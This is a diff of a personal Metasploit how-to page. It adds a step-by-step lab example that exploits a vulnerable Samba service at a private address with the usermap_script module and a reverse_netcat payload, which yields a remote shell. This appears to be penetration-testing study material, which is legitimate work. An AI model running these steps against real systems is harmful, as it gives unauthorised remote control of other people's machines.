dvanmosselbeen/dvm-docs/OS/Security/metasploit.md

     exploit

-From now, you are on the remote host and you have full access on the remote host.
+From now, you are on the remote host, and you have full access on the remote host.
+You can check it with `uname -a` to see the linux version and check your user rights with `id`.

     touch /tmp/your-been-hacked

 And you can verify on that host machine to check if the file `touch /tmp/your-been-hacked` has been created.

+# Another example

+In this example we will look to the vulnerable version of Samba that is installed on that remote computer.

+    139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
+    445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)

+So in the `msfconsole`:

+    use exploit/multi/samba/usermap_script

+Now show the options that are available for this exploit:

+    show options

+    set RHOST 10.0.2.6

+Payloads are small pieces of code that will be executed when the vulnerability has been exploited.

+See what available payloads there is available:

+    show payloads

+*Note that a default payload has been loaded with we started to use this `username_script exploit`.
+Note also that not all payloads actually work.*

+To set a different payload, you can use the following command:

+    set PAYLOAD payload/cmd/unix/reverse_netcat

+Finally, launch the exploit:

+    exploit